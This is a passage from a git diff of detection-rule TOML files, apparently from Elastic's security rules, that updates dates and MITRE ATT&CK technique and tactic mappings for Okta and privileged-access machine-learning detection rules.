a/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml +++ b/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/14" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -76,16 +76,22 @@ event.dataset:okta.system and event.action:app.generic.unauth_app_access_attempt [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" @@ -93,6 +99,7 @@ framework = "MITRE ATT&CK" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" @@ -100,6 +107,7 @@ framework = "MITRE ATT&CK" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" @@ -107,4 +115,3 @@ framework = "MITRE ATT&CK" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml b/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml index 3980b66a6b4..afd4246e872 100644 --- a/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml +++ b/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/06" integration = ["okta"] maturity = "production" -updated_date = "2026/01/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -111,14 +111,36 @@ value = "now-5d" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1199" name = "Trusted Relationship" reference = "https://attack.mitre.org/techniques/T1199/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml b/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml index 2a87b962d34..100a80ef79b 100644 --- a/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml +++ b/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml @@ -2,7 +2,7 @@ creation_date = "2024/10/07" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,17 +78,39 @@ event.dataset: "okta.system" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["client.user.name", "okta.client.user_agent.raw_user_agent"] diff --git a/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml b/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml index 3cee4601d83..5e724854e3d 100644 --- a/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml +++ b/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,50 +80,13 @@ event.dataset:okta.system and event.action:user.account.report_suspicious_activi [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml b/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml index fdf12c3e90b..a651b18fce8 100644 --- a/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml +++ b/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/07" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,22 +87,39 @@ event.dataset:okta.system [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.004" name = "Web Session Cookie" reference = "https://attack.mitre.org/techniques/T1550/004/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.004" +name = "Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1550/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.threshold] field = ["okta.actor.id"] value = 1 diff --git a/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml b/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml index 859394bc1c4..2d50aeeea9a 100644 --- a/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml +++ b/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,14 +86,31 @@ event.dataset:okta.system and event.action:group.privilege.grant [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml b/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml index 4e3bb956cee..ae9abcc159f 100644 --- a/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml +++ b/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2026/02/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -92,14 +92,36 @@ event.dataset:okta.system [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml b/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml index 3d49244c971..110fba31686 100644 --- a/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml +++ b/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -85,14 +85,23 @@ event.dataset:okta.system and event.action:system.api_token.create [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/okta/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.toml b/rules/integrations/okta/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.toml index 399af2398c6..7b826d1c120 100644 --- a/rules/integrations/okta/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.toml +++ b/rules/integrations/okta/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,14 +86,31 @@ event.dataset:okta.system and event.action:user.mfa.factor.reset_all [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml b/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml index 3f356b7f3ee..04ca3459ae7 100644 --- a/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml +++ b/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/20" integration = ["okta"] maturity = "production" -updated_date = "2025/09/08" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -85,19 +85,36 @@ sequence by okta.target.id with maxspan=12h [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique.subtechnique]] id = "T1556.006" name = "Multi-Factor Authentication" reference = "https://attack.mitre.org/techniques/T1556/006/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/persistence_new_idp_successfully_added_by_admin.toml b/rules/integrations/okta/persistence_new_idp_successfully_added_by_admin.toml index ec410cc91fd..96b1ea065fd 100644 --- a/rules/integrations/okta/persistence_new_idp_successfully_added_by_admin.toml +++ b/rules/integrations/okta/persistence_new_idp_successfully_added_by_admin.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/06" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -76,19 +76,46 @@ event.dataset: "okta.system" and event.action: "system.idp.lifecycle.create" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique.subtechnique]] id = "T1556.007" name = "Hybrid Identity" reference = "https://attack.mitre.org/techniques/T1556/007/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[[rule.threat.technique.subtechnique]] +id = "T1484.002" +name = "Trust Modification" +reference = "https://attack.mitre.org/techniques/T1484/002/" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.007" +name = "Hybrid Identity" +reference = "https://attack.mitre.org/techniques/T1556/007/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml b/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml index b85da21efcb..c9f05289582 100644 --- a/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml +++ b/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/01" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,14 +86,36 @@ event.dataset:okta.system and event.action:(application.policy.sign_on.update or [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.009" +name = "Conditional Access Policies" +reference = "https://attack.mitre.org/techniques/T1556/009/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.009" +name = "Conditional Access Policies" +reference = "https://attack.mitre.org/techniques/T1556/009/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml b/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml index 95c5b7cbd46..8fe48c52427 100644 --- a/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "sysmon_linux"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -89,14 +89,18 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml b/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml index cea8bce82f4..edb900374fd 100644 --- a/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "sysmon_linux"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -90,14 +90,26 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml b/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml index c25efcf1291..9a2e727746b 100644 --- a/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "sysmon_linux"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -88,14 +88,18 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml index 225018502ae..7b479bfd9c8 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -89,6 +89,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" @@ -99,9 +100,20 @@ id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml index 1387bf22786..e2754c6f00b 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -89,14 +89,36 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml index f79d485a9c4..eddc6f5cc81 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -89,14 +89,31 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml index 938ae0eef73..9568430174e 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -88,14 +88,31 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml index f84ac248bfd..5d92fbdb973 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -88,6 +88,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" @@ -103,9 +104,20 @@ id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml index 14c6f23bdb1..e1575db67f9 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -88,6 +88,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" @@ -98,9 +99,35 @@ id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml index abd5652b01f..1a67cb5a82f 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -88,6 +88,7 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" @@ -98,9 +99,25 @@ id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1098" +name = "Account 